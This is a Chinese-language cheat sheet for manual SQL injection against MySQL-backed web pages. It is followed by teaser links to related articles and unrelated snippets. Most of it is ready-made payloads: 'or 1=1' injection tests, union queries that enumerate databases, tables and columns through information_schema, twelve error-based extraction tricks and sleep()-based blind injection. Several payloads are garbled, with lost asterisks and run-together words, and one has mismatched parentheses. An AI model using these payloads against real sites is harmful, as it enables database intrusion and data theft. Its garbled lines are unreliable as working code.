手动SQL注入总结
1.基于报错与union的注入
注意:union联合查询注入一般要配合其他注入使用
A.判断是否存在注入,注入是字符型还是数字型,有没过滤了关键字,可否绕过
a.如何判断是否存在注入
一般有一下几种
or 1=1--+
'or 1=1--+
"or 1=1--+
)or 1=1--+
')or 1=1--+
") or 1=1--+
"))or 1=1--+
既把前面的引号或括号进行补全,后要保证格式的正确,让我们的语句可以顺利执行。
B.SQL查询语句中的字段数
order by 数字 --+
C.确定显示位,要用错误的数据,如?id=-1
union select 1,2,3--+
此处要注意,字段数要一致
D.获取当前数据库
获取库名:union select 1,database(),3
E.获取数据库中的表
获取表名:union select 1,(select table_name from information_schema.tables where table_schema='库名' limit 0,1),3
F.获取数据表中的字段名
获取字段名:union select 1,(select column_name from information_schema.columns where table_schema='库名' and table_name='表名' limit 0,1),3
G.下载数据
2.盲注(返回结果只有 true 和 false).
A.判断是否存在注入,注入是字符型还是数字型,有没过滤了关键字,可否绕过
B.依次猜测库名、表名、字段名的长度
C.依次猜测库名、表名、字段名,可使用burp得intruder模块
(orderby盲注 ).
3.报错注入(十二种)
A.floor()
id=1 and (select 1 from (select count(),concat(user(),floor(rand(0)2))x from information_schema.tables group by x)a)--+
B.extractvalue()
id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)))--+
C.updatexml()
id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1))--+
D.geometrycollection()
id=1 and geometrycollection((select * from(select * from(select user())a)b))--+
E.multipoint()
id=1 and multipoint((select * from(select * from(select user())a)b))--+
F.polygon()
id=1 and polygon((select * from(select * from(select user())a)b))--+
G.multipolygon()
id=1 and multipolygon((select * from(select * from(select user())a)b))--+
H.linestring()
id=1 and linestring((select * from(select * from(select user())a)b))--+
I.multilinestring()
id=1 and multilinestring((select * from(select * from(select user())a)b))--+
J.exp()
id=1 and exp(~(select * from(select user())a))--+
K.NAME_CONST
and exists(selectfrom (selectfrom(selectname_const(@@version,0))a join (select name_const(@@version,0))b)c)--+
L.GeometryCollection()
and GeometryCollection(()select *from(select user () )a)b )--+
3.时间注入(类似盲注)
A.判断库名长度
and if(length(database()>=1),sleep(5),1)--+
B.判断库名
and if(substr(database(),1,1)='s',sleep(5),1)--+
注意:时间注入和盲注,可能需使用burp的intruder模块
总结:SQL注入其实就是将自己的sql语句拼接到网页的php程序中,利用程序的设计漏洞,获取数据库的内容
手动SQL注入总结的更多相关文章
- 手动SQL注入原理分析与实践
代码仓库 本文所用代码的代码库地址: 点击这里前往Github仓库 了解SQL注入 定义 SQL注入攻击(SQL Injection),简称注入攻击,是Web开发中最常见的一种安全漏洞.可以用它来从数 ...
- 记一次手动SQL注入
1.检测到可能存在注入漏洞的url 最常用的 ' ,and 1=1 ,and 1=2 http://www.xxx.com/subcat.php?id=1 2.判断字段个数 http://www.xx ...
- kali linux之手动漏洞挖掘三(sql注入)
服务器端程序将用户输入作为参数作为查询条件,直接拼写sql语句,并将结果返回给客户端浏览器 如判断登录 select * from users where user='uname' and passw ...
- Java防止SQL注入2(通过filter过滤器功能进行拦截)
首先说明一点,这个过滤器拦截其实是不靠谱的,比如说我的一篇文章是介绍sql注入的,或者评论的内容是有关sql的,那会过滤掉:且如果每个页面都经过这个过滤器,那么效率也是非常低的. 如果是要SQL注入拦 ...
- mybatis中#{}与${}的差别(如何防止sql注入)
默认情况下,使用#{}语法,MyBatis会产生PreparedStatement语句中,并且安全的设置PreparedStatement参数,这个过程中MyBatis会进行必要的安全检查和转义. # ...
- SQL注入攻防入门详解
=============安全性篇目录============== 本文转载 毕业开始从事winfrm到今年转到 web ,在码农届已经足足混了快接近3年了,但是对安全方面的知识依旧薄弱,事实上是没机 ...
- 用java PreparedStatement就不用担心sql注入了吗?
先感慨下,好久没写博客了,一是工作太忙,二是身体不太给力,好在终于查清病因了,趁着今天闲下来,迫不及待与读者交流,最后忠告一句:身体是活着的本钱! 言归正传,对java有了解的同学基本上都体验过JDB ...
- sqlmap和burpsuite绕过csrf token进行SQL注入检测
利用sqlmap和burpsuite绕过csrf token进行SQL注入 转载请注明来源:http://www.cnblogs.com/phoenix--/archive/2013/04/12/30 ...
- MyBatis怎么防止SQL注入
SQL注入是一种代码注入技术,用于攻击数据驱动的应用,恶意的SQL语句被插入到执行的实体字段中(例如,为了转储数据库内容给攻击者).[摘自] SQL injection - Wikipedia SQL ...
随机推荐
- flask下直接展示mysql数据库 字段
在工作中,会导出一份mysql的html来查看,用的是就是路过秋天大神的那个工具,所以想自己用那个样式直接在后端写一个页面做展示! 前端页面 from flask import Flask,reque ...
- C#程序员装机必备软件及软件地址
装机必备 Visio2010 下载 http://gd.ddooo.com/visio2010_12530.rar Office 安装包 http://xz.cncrk.com:8080/soft/k ...
- OFD呼之欲来、来之跚跚,谁之罪?
软件国产化的浪潮势不可挡,美国逼得逾甚,我们压迫感逾强,唯有奋起直追方慰平生之志. 在板式文档领域,pdf已成为国际标准,亦可称为美国标准:它在该领域一枝独秀,已形成一览众山小之势! pdf出道20余 ...
- IO—》Properties类&序列化流与反序列化流
Properties类 介绍:Properties 类表示了一个持久的属性集.Properties 可保存在流中或从流中加载.属性列表中每个键及其对应值都是一个字符串. Properties类特点: ...
- 《Python游戏编程快速上手》|百度网盘免费下载|Python基础编程
<Python游戏编程快速上手>|百度网盘免费下载| 提取码:luy6 Python是一种高级程序设计语言,因其简洁.易读及可扩展性日渐成为程序设计领域备受推崇的语言. 本书通过编写一个个 ...
- scrapyd 部署
步骤 1 pip install scrapyd pip install scrapy-client 步骤 2 修改 scrapy.cfg [deploy:targetName]url = http: ...
- 安装fiddler 谷歌插件
移动 .crx 插件无法安装问题 解决方案: 修改后缀名为 .zip 文件 进行解压后,使用浏览器扩展程序加载已解压的文件进行扩展 添加插件 2020-06-20
- Python获取当前时间_获取格式化时间_格式化日期
Python获取当前时间_获取格式化时间: Python获取当前时间: 使用 time.time( ) 获取到距离1970年1月1日的秒数(浮点数),然后传递给 localtime 获取当前时间 #使 ...
- 将形如 5D, 30s 的字符串转为秒
import sys def convert_to_seconds(time_str): # write code here if 's' in time_str: return float(time ...
- 什么是PHP 面向对象
PHP 面向对象 在面向对象的程序设计(英语:Object-oriented programming,缩写:OOP)中,对象是一个由信息及对信息进行处理的描述所组成的整体,是对现实世界的抽象. 在现实 ...